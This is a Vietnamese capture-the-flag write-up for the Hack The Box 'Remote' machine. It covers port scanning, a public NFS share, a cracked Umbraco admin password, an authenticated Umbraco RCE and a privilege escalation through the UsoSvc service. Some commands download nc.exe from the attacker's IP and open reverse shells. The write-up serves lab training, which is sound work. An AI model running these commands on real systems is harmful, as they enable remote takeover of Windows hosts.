+6

[Hackthebox - Writeup] Remote

Recon

Nmap

Việc sử dụng nmap để quét toàn bộ cổng của machine là 1 việc làm bất di bất dịch nếu các bạn muốn tấn công lên machine đó.

PORT   STATE SERVICE    VERSION
21/tcp  open ftp      Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp  open http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|  program version  port/proto service
|  100000 2,3,4    111/tcp  rpcbind
|  100000 2,3,4    111/tcp6 rpcbind
|  100000 2,3,4    111/udp  rpcbind
|  100000 2,3,4    111/udp6 rpcbind
|  100003 2,3     2049/udp  nfs
|  100003 2,3     2049/udp6 nfs
|  100003 2,3,4    2049/tcp  nfs
|  100003 2,3,4    2049/tcp6 nfs
|  100005 1,2,3    2049/tcp  mountd
|  100005 1,2,3    2049/tcp6 mountd
|  100005 1,2,3    2049/udp  mountd
|  100005 1,2,3    2049/udp6 mountd
|  100021 1,2,3,4   2049/tcp  nlockmgr
|  100021 1,2,3,4   2049/tcp6 nlockmgr
|  100021 1,2,3,4   2049/udp  nlockmgr
|  100021 1,2,3,4   2049/udp6 nlockmgr
|  100024 1      2049/tcp  status
|  100024 1      2049/tcp6 status
|  100024 1      2049/udp  status
|_ 100024 1      2049/udp6 status
135/tcp  open msrpc     Microsoft Windows RPC
139/tcp  open netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open microsoft-ds?
2049/tcp open mountd    1-3 (RPC #100005)
5985/tcp open http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc     Microsoft Windows RPC
49665/tcp open msrpc     Microsoft Windows RPC
49666/tcp open msrpc     Microsoft Windows RPC
49667/tcp open msrpc     Microsoft Windows RPC
49678/tcp open msrpc     Microsoft Windows RPC
49679/tcp open msrpc     Microsoft Windows RPC
49680/tcp open msrpc     Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 3m03s
| smb2-security-mode: 
|  2.02: 
|_  Message signing enabled but not required
| smb2-time: 
|  date: 2020-04-12T13:13:30
|_ start_date: N/A

Ở đây chúng ta thấy có khá nhiều port đang mở, mình thì hay khám phá các dịch vụ web trước 😛. Tuy nhiên vào trang web thì cũng chẳng có gì nhiều.

Fuzz

Check qua một lượt trang web dường như không có gì, thì chúng ta cần fuzzing xem có dịch vụ web nào tại port 80 nữa không.
Sử dụng gobuster để recon:

gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/dirb/common.txt

Kết quả có 1 thư mục là /umbraco chạy Umbraco CMS

Có một trang đăng nhập

Get User

Searchsploit xem có CVE nào k thì thấy có 1 cái RCE được

➜ Remote searchsploit umbraco
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution        | exploits/aspx/webapps/46153.py

Nhưng rất tiếc là cần phải đăng nhập mới có thể RCE được, tiếp tục đi tìm tài khoản đăng nhập của web.

Trong kết quả nmap thấy có cổng 111 đang mở, ở Linux có lệnh showmount để xem có thư mục nào đang public hay không

➜ Remote sudo showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

Thấy có thư mục public, thực hiện mount vào để đọc thêm thông tin

➜ Remote sudo mount -t nfs remote.htb:/site_backups .       
➜ Remote ls
App_Browsers App_Plugins  bin   css      Global.asax scripts Umbraco_Client Web.config
App_Data   aspnet_client Config default.aspx Media    Umbraco Views

Quá trời quá đất thư mục, đọc lần lượt thì thấy có 1 file tên là Umbrella.sdf. Khuyến khích mở file này bên Win, mở bên Kali lag lòi kèn @@

Thấy có một vài mã hash passwd, list ra. Đã sử dụng psexe.py với những hash này nhưng k được, sử dụng John để crack passwd thì lấy được 1 account tên là admin@htb.local:baconandcheese. Sử dụng tài khoản này để đăng nhập vào trang login lúc nãy thì đăng nhập được.

Kiểm tra phiên bản đúng là phiên bản 7.12.4, sử dụng lỗ hổng RCE bên trên tìm được để khai thác, thực hiện custom mã đi một chút.

Invoke-WebRequest -Uri http://10.10.14.5:8080/nc.exe -OutFile C:/windows/temp/nc.exe; C:/windows/temp/nc.exe 10.10.14.5 4444 -e powershell

Hoặc đơn giản hơn có thể sử dụng mã khác xịn hơn tại https://github.com/noraj/Umbraco-RCE, mã này dễ sử dụng hơn và k cần phải custom giống mã trên exploitdb

Lấy được cờ user trong Public

Get Root

Việc lên Root này mình đã có bài viết chi tiết tại https://viblo.asia/p/leo-thang-dac-quyen-trong-windows-windows-privilege-escalation-1-service-exploits-vyDZO7QOZwj

Kiểm tra dịch vụ đang có trên box

PS C:\Users\Administrator\Documents> Get-Service
Stopped UsoSvc       Update Orchestrator Service

Có dịch vụ này của Windows Update, tìm thấy trên Payload All The Thing cve-2019-1322-usosvc

Có payload rồi, vậy thì cứ step by step là ra thôi 😄

PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\nc.exe 10.10.14.5 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
    TYPE        : 20 WIN32_SHARE_PROCESS 
    START_TYPE     : 2  AUTO_START (DELAYED)
    ERROR_CONTROL   : 1  NORMAL
    BINARY_PATH_NAME  : C:\nc.exe 10.10.14.5 4444 -e cmd.exe
    LOAD_ORDER_GROUP  : 
    TAG        : 0
    DISPLAY_NAME    : Update Orchestrator Service
    DEPENDENCIES    : rpcss
    SERVICE_START_NAME : LocalSystem

PS C:\Windows\system32> sc.exe start UsoSvc

Lên root rồi lấy cờ cuối thôi 😄

PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> type root.txt
3b9f87e333e859963172519b3b724462

Kết luận

Đây là một bài khá cơ bản với machine Windows, hi vọng các bạn đọc bài viết này của mình sẽ thu lại được thứ gì đó, happy hacking 😄


All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.